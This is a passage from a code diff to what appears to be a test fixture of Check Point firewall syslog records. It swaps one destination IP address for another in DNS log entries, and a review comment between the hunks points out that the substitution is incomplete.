
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55965"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:26:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ebd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524413"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36744"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:27:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ec7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524423"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50482"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T23:27:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ec9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T23:27:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ecd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52390"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T23:27:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ecd,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; 
outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52391"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T23:27:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ece,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52392"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T23:27:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ece,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52393"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T23:27:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ed1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37768"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] -<134>1 2020-03-29T23:27:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ed1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524433"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47343"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:27:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ed1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524433"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47343"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T23:27:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ed1,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59414"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10895"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T23:27:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ed1,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52662"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T23:27:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ed1,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; 
version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61446"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10896"; xlatesrc:"0.0.0.0"] 
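Review bot: The hunk replaces `dst:"8.8.8.8"` with `dst:"175.16.199.1"` only on the changed lines, while other real public destinations in the same hunk's context lines — e.g. `dst:"104.108.169.64"`, `dst:"192.124.249.31"`, `dst:"104.99.234.45"` — are left as they were, so if the aim is to keep real-world addresses out of this fixture the substitution is partial. The new value is itself a routable public address rather than one from an RFC 5737 documentation range (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24), which suggests it was chosen for a specific reason (presumably a known entry in a test enrichment database); stating that reason in the commit message would stop a later cleanup from "fixing" it. The same `8.8.8.8` → `175.16.199.1` substitution continues in the next hunk at `@@ -7096,23 +7096,23 @@`, which runs past the end of this view.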
@@ -7096,23 +7096,23 @@ <134>1 2020-03-29T23:27:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ed1,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"49066"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10897"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T23:27:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ed2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50845"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T23:27:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ed2,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.108.169.64"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43484"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10898"; xlatesrc:"0.0.0.0"] -<134>1 2020-03-29T23:27:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812edb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524443"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50767"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:27:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812edb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524443"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; 
parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50767"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T23:27:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ee3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52394"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T23:27:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ee3,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52395"; service:"443"; service_id:"https"; src:"192.168.1.117"] -<134>1 2020-03-29T23:27:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ee5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45671"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T23:27:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812eef,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524463"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54505"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:27:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ee5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45671"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:27:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812eef,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524463"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54505"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T23:27:45Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ef1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T23:27:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ef9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524473"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56976"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:27:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ef9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524473"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56976"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:27:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812efa,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2";
outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59657"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:27:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812efa,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46150"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10899"; xlatesrc:"0.0.0.0"]
